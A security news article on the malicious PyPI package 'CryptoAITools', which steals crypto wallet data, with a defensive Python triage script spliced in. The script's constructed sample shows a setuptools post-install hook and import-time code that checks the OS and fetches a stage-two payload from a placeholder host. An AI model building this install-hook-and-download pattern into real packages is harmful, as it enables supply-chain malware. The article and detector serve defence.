Boztek

Researchers Uncover Python Package Targeting Crypto Wallets with Malicious Code

Cybersecurity researchers have uncovered a hazardous Python package named “CryptoAITools,” which disguises itself as a cryptocurrency trading tool while containing malicious features aimed at stealing sensitive information and draining assets from crypto wallets. This package was disseminated through the Python Package Index (PyPI) and counterfeit GitHub repositories, accumulating more than 1,300 downloads before its removal from PyPI.

The malware initiates its harmful actions automatically upon installation, targeting both Windows and macOS platforms. According to a report from Checkmarx, it employs a deceptive graphical user interface (GUI) designed to distract victims while executing malicious activities in the background. The core of the malware’s operation resides within the “__init__.py” file, which incorporates code to identify the operating system, allowing it to deploy the appropriate harmful components.

Notably, the malware initiates a multi-stage infection process by injecting helper functionality capable of downloading additional payloads. These payloads are sourced from a counterfeit website, “coinsw[.]app,” which falsely advertises a cryptocurrency trading bot service. This strategy not only aids the cybercriminals in evading detection but also permits them to modify the malware’s functionalities by altering the payloads hosted on the seemingly legitimate website.

The infection mechanism also includes a GUI element that misleads victims during what appears to be a setup process, while the malware surreptitiously collects sensitive information from the compromised systems. Checkmarx highlighted that the primary objective of the CryptoAITools malware is extensive data theft, targeting a multitude of sensitive details critical for stealing cryptocurrency assets. This encompasses information from various cryptocurrency wallets (such as Bitcoin, Ethereum, and others), saved passwords, browser cookies, browsing history, financial data, and even Telegram messages.

For macOS users, the malware goes a step further by extracting data from Apple’s Notes and Stickies applications. Once the stolen data has been gathered, it is uploaded to the gofile[.]io file transfer service, and the local copies are then erased to remove any trace of the theft.
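The behaviour described in the last three paragraphs (code that runs at install or import time, an operating-system check, a staged download from a remote host, and deletion of local artefacts after exfiltration) is visible in package source before anything is executed. The following static triage script is an added example, not code from Checkmarx or from the package discussed: it parses each module of an unpacked package with Python's `ast` module, flags setuptools command-class overrides, module-scope execution and the assumed indicator calls listed at the top, and combines them into a coarse risk level. The indicator names and the two sample packages at the bottom are constructed assumptions, not indicators from the report.

```python
"""Static triage of an unpacked Python package for install-time execution,
OS detection, staged download and post-exfiltration cleanup indicators.

Added example (not Checkmarx's or the package's code). Indicator sets and
sample sources are constructed assumptions for illustration.
"""
import ast
from dataclasses import dataclass

# Assumed indicator sets; adjust to your own review checklist.
OS_DETECT = {"platform.system", "sys.platform", "os.name", "platform.platform"}
NETWORK = {"urllib.request.urlopen", "urlopen", "requests.get", "requests.post",
           "socket.create_connection"}
EXEC = {"exec", "eval", "os.system", "subprocess.run", "subprocess.Popen"}
DELETE = {"os.remove", "os.unlink", "shutil.rmtree"}
# setuptools command classes a package can subclass to run code during `pip install`.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}


@dataclass(frozen=True)
class Finding:
    file: str
    line: int
    category: str
    detail: str


def _dotted(node):
    """'a.b.c' for Name/Attribute chains, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _is_main_guard(test):
    """True for the `if __name__ == "__main__":` idiom, which is not import-time execution."""
    return (isinstance(test, ast.Compare)
            and _dotted(test.left) == "__name__"
            and any(isinstance(c, ast.Constant) and c.value == "__main__"
                    for c in test.comparators))


def scan_module(filename, source):
    """Return a list of Finding for one module's source text."""
    tree = ast.parse(source, filename)
    findings = []

    # Statements that execute as soon as the module is imported (e.g. __init__.py).
    # setup.py always has a module-level setup() call, so it is skipped here;
    # its install-time signal is the command-class override found below.
    if not filename.endswith("setup.py"):
        for stmt in tree.body:
            if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
                findings.append(Finding(filename, stmt.lineno, "module_level",
                                        "call at module scope"))
            elif isinstance(stmt, ast.If) and not _is_main_guard(stmt.test):
                findings.append(Finding(filename, stmt.lineno, "module_level",
                                        "conditional at module scope"))

    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = _dotted(base)
                if name and name.rsplit(".", 1)[-1] in INSTALL_HOOKS:
                    findings.append(Finding(filename, node.lineno, "install_hook",
                                            f"class {node.name}({name})"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            for cat, names in (("network", NETWORK), ("exec", EXEC), ("delete", DELETE)):
                if name in names:
                    findings.append(Finding(filename, node.lineno, cat, name))
        elif isinstance(node, ast.Attribute):
            # platform.system()/sys.platform reads are attribute accesses, not plain calls
            name = _dotted(node)
            if name in OS_DETECT:
                findings.append(Finding(filename, node.lineno, "os_detect", name))
    return findings


def risk_level(findings):
    """Coarse verdict: early execution plus network access is the high-risk combination."""
    cats = {f.category for f in findings}
    runs_early = bool(cats & {"install_hook", "module_level"})
    if runs_early and "network" in cats:
        return "high"
    if "network" in cats and cats & {"os_detect", "delete", "exec"}:
        return "medium"
    return "low" if findings else "none"


def triage(package):
    """package maps filename -> source text; returns (risk, findings)."""
    findings = []
    for filename, source in package.items():
        findings.extend(scan_module(filename, source))
    return risk_level(findings), findings


# Constructed sample mirroring the article's description (hypothetical package, placeholder host).
SUSPICIOUS = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import mypkg\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        install.run(self)\n"
        "        mypkg.start()\n"
        "setup(name='mypkg', cmdclass={'install': PostInstall})\n"
    ),
    "mypkg/__init__.py": (
        "import os, platform, urllib.request\n"
        "STAGE2 = 'https://example.invalid/stage2'  # placeholder, not a real host\n"
        "def start():\n"
        "    if platform.system() == 'Windows':\n"
        "        urllib.request.urlopen(STAGE2)\n"
        "    os.remove('collected.zip')\n"
        "start()\n"
    ),
}

# Constructed benign package for comparison.
BENIGN = {
    "goodpkg/__init__.py": (
        "import json\n"
        "def load(path):\n"
        "    with open(path) as fh:\n"
        "        return json.load(fh)\n"
    ),
}

if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        risk, found = triage(pkg)
        print(f"{label}: {risk}")
        for f in found:
            print(f"  {f.file}:{f.line} {f.category} {f.detail}")
```

Run it against an sdist unpacked with `pip download --no-binary :all: <name>` and `tar xf` before installing; the point is to inspect `setup.py` and `__init__.py` without letting either execute. The heuristics are deliberately simple and will flag legitimate packages that make network calls at import time, so treat "high" as a prompt for manual review rather than a verdict.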

Additionally, the same stealer malware has been distributed via a related GitHub repository dubbed Meme Token Hunter Bot, purportedly an AI-driven trading bot for listing meme tokens on the Solana network. This repository remains operational and has garnered interest, being forked once and receiving ten stars, indicating an ongoing risk for users who may run the code directly from GitHub.

The attackers also maintain a Telegram channel that promotes the malicious GitHub repository while offering subscriptions and technical support, further extending their reach within the cryptocurrency community. This multi-platform distribution strategy allows the attackers to engage potential victims across different venues, capitalizing on user trust in varying platforms.

The implications of the CryptoAITools malware campaign are substantial, potentially detrimental not only to individual victims but also to the broader cryptocurrency ecosystem. Those who interacted with the malicious “Meme-Token-Hunter-Bot” repository face heightened risks, illustrating the extensive impact of this threat. The findings underscore the pressing need for vigilance and proactive measures within the cryptocurrency community to safeguard sensitive information against such attacks.